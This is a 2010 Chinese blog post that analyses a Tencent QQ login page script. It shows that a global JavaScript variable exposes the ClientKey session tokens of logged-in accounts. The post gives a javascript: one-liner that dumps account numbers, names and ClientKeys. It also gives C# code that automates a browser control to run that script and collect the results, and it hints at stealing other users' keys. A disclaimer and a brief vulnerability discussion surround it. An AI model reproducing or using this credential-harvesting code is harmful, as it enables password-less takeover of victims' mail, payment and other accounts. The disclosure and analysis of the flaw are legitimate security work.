漏洞无处不在之窃取你的QQ信息

申明

 以下在文章中出现的内容皆从技术角度探讨问题,请勿使用下文所提到的技术从事非法行为!

                                                                           Thursday, July 01, 2010 


我的上一篇博客 《检测本地是否登录了指定QQ》 中介绍了通过QQ官方页面来获取已登陆QQ信息的方法,

通过对QQ页面中js文件的研究,我们可以更进一步的获取到更多信息!

下面我们就来一步一步分析下,

 

首先来看一下上次文章中提到的js中的一个关键函数:

hummer_loaduin()
function hummer_loaduin(){
    q_aUinList.length
=0;
    
var P=q_hummerQtrl.DoOperation(1,g_vOptData);
    
if(null==P)
    {  
return }
    
try{
        
var M=P.GetArray("PTALIST");
        
var T=M.GetSize();
        
var O="";
        
var F=document.getElementById("list_uin");
        
for(var U=0;U<T;U++)
        {
            
var C=M.GetData(U);
            
var R=C.GetDWord("dwSSO_Account_dwAccountUin");
            
var G="";
            
var J=C.GetByte("cSSO_Account_cAccountType");
            
var S=R;
            
if(J==1)
            {
                
try{
                    G
=C.GetArray("SSO_Account_AccountValueList");
                    S
=G.GetStr(0)
                }
                
catch(Q)
                {}
            }
            
var K=0;
            
try{
                K
=C.GetWord("wSSO_Account_wFaceIndex")
            }
            
catch(Q)
            {K
=0}
            
var L="";
            
try{
                L
=C.GetStr("strSSO_Account_strNickName")
            }
            
catch(Q)
            {L
=""}
            
var D=C.GetBuf("bufGTKey_PTLOGIN");
            
var E=C.GetBuf("bufST_PTLOGIN");
            
var I="";
            
var A=E.GetSize();
            
for(var N=0;N<A;N++)
            {
                
var B=E.GetAt(N).toString("16");
                
if(B.length==1)
                {B
="0"+B}
                I
+=B
            }
            
var H={uin:R,name:S,type:J,face:K,nick:L,key:I};
            q_aUinList[U]
=H
        }
        
switch(q_aUinList.length)
        {
            
case 0:ptui_reportAttr(77430,false);break;
            
case 1:ptui_reportAttr(77431,false);break;
            
default:ptui_reportAttr(77432,false)
        }
    }
    
catch(Q){}
}

 

我们注意函数中的这一句:var H={uin:R,name:S,type:J,face:K,nick:L,key:I}; 

 

为什么要注意这一句呢,我们假设现在不清楚它的COM 是通过哪些接口哪些命名来获取QQ信息的,

但一般来说看字面意思 uin即是QQ账号 name即是QQ用户名 key当然就是。。(呵呵,大家应该都知道了) 

 

 为什么要强调这句代码呢,不是为了来理解字面意思,而是先让大家认识下本文的主题“窃取你的QQ信息”

 下面先给大家介绍一个东西:

  ClientKey,

想必很多人都知道这个东西,也不乏有很多人在网上讨论如何获取这个东西,不知道的同学们现在就要注意啦,

ClientKey 是一个你QQ登陆成功后从服务器返回来的值,利用这个值可以使用你账号在QQ的所有应用(这里说的有点不大清楚,不过还是自己去查下吧), 

比如:通过ClientKey 我就可以登陆你的拍拍账号,甚至是财付通账号,通过ClientKey 我不需要你的QQ号密码就能登录你的QQ邮箱


 好了,废话不多说,我们接着分析,说到了ClientKey,那么聪明的同学都想到了 ClientKey就对应上面的var H.key,

var H的其他字段都不重要了,因为有了key的存在,

 好,继续看var H 这句代码的下面一句:q_aUinList[U]=H 

大家猜猜 q_aUinList 会是什么呢, (呵呵,猜个鸟啊猜)  往上看,var q_aUinList=new Array();

这下知道咯 ,原来 q_aUinList 是个数组对象哦,综合起来:

for(var U=0;U<T;U++)

{

 var H={uin:R,name:S,type:J,face:K,nick:L,key:I};

 q_aUinList[U]=H ;

很明显咯,q_aUinList数组对象存放了当前电脑所有登陆成功的QQ号的信息了,这还不是最关键(猜到最关键的是什么了麽?)!

 

最最最最关键的是, var q_aUinList  居然是一个全局变量,

这也是漏洞的所在了,在js文件中既然var q_aUinList是一个全局变量,那么,引用这个js的网页都可以访问这个var q_aUinList变量了,

恰恰我们的腾讯官方页面加载后首先就调用了上文说到的2个关键函数,也就是在调用过程中 var q_aUinList变量的值已经被赋好了,

 

而且 而且这玩意还允许我们访问,既然你允许,那我就毫不客气的来访问一下咯:

构造如下的javascript代码:

javascript:for(var C=0;C<q_aUinList.length;C++){var D=q_aUinList[C];document.write(D.uin+","+D.name+","+D.key+"\r");}

很简单的一句代码,大家试着在已打开的腾讯登陆页面地址栏输入这句代码试试:

不出意料, q_aUinList 被我们遍历了,q_aUinList值被我们读取了,高潮结束了,QQ信息就这样被我们窃取了,哎!

 

 不要急,猴急的同学要骂我了,你这取还不是只能取自己的,那要如何取别人的呢,关于这个我也就不多解释了,我想会写程序的哥们都应该知道吧!

 为了测试还是给出一段代码:

GetLoginedCache()
 /// <summary>
        
/// 暴力
        
/// </summary>
        
/// <returns></returns>
       public List<LoginedInfo> GetLoginedCache()
       {
           
string htmlText = browser.Document.Body.InnerText;
           List
<LoginedInfo> qqlist = new List<LoginedInfo>();
           
string jscript = "javascript:for(var C=0;C<q_aUinList.length;C++){var D=q_aUinList[C];document.write(D.uin+\",\"+D.name+\",\"+D.key+\"$\");}void(0);";
           browser.Navigate(jscript);
           
string readText = browser.Document.Body.InnerText;
           
while (readText==htmlText)
           {
               readText 
= browser.Document.Body.InnerText;
               Application.DoEvents();
           }
           
string[] sArry = Regex.Split(readText, "$");
           
for (int i = 0; i < sArry.Length;i++)
           {
               
if (sArry[i] != "" && sArry[i].Contains(","))
               {
                   
string[] infos = Regex.Split(sArry[i], ",");
                   
if(infos.Length==3)
                   {
                       qqlist.Add(
new LoginedInfo(infos[0],infos[1],infos[2]));
                   }
               }
           }
           
return qqlist;
       }
       
//var H={uin:R,name:S,type:J,face:K,nick:L,key:I};
       public class LoginedInfo
       {
           
public LoginedInfo(string uin ,string name,string key)
           {
               
this.Uin = uin;
               
this.Name = name;
               
this.Key = key;
           }
           
public string Uin{get;set;}
           
public string Name{get;set;}
           
public string Key{get;set;}
       }

 

 

到此为止,文章也快结束了,我们来谈谈这到底算不算漏洞,为什么会发生这样的漏洞!

首先,我个人认为这是一个漏洞,而且我个人还认为一个页面的小瑕疵都可以说是漏洞,更何况此!

其实,漏洞产生的原因, 很明显因为q_aUinList出了安全问题, 我个人不懂js也不会写js,不知道js里有没有private,public约束,

至少在我们的c#程序里,如果q_aUinList保存的是一个关键信息,它肯定不应该是public的,

 

通过本次分析,其实我们可以看到js虽然好用,但并不一定安全,就算没有了q_aUinList变量保存QQ信息,只要页面能获取,那就有可能被非法用户获取!

好了,说了这么多该结束了,文章只是自己在前一篇文章中分析xue.js是发现现在又补充的一篇文章,希望大家不要用来做坏事!

 

ps:也希望我们的网络是安全的 

 

posted @ 2010-07-01 14:55  lianghugg  阅读(4051)  评论(5编辑  收藏  举报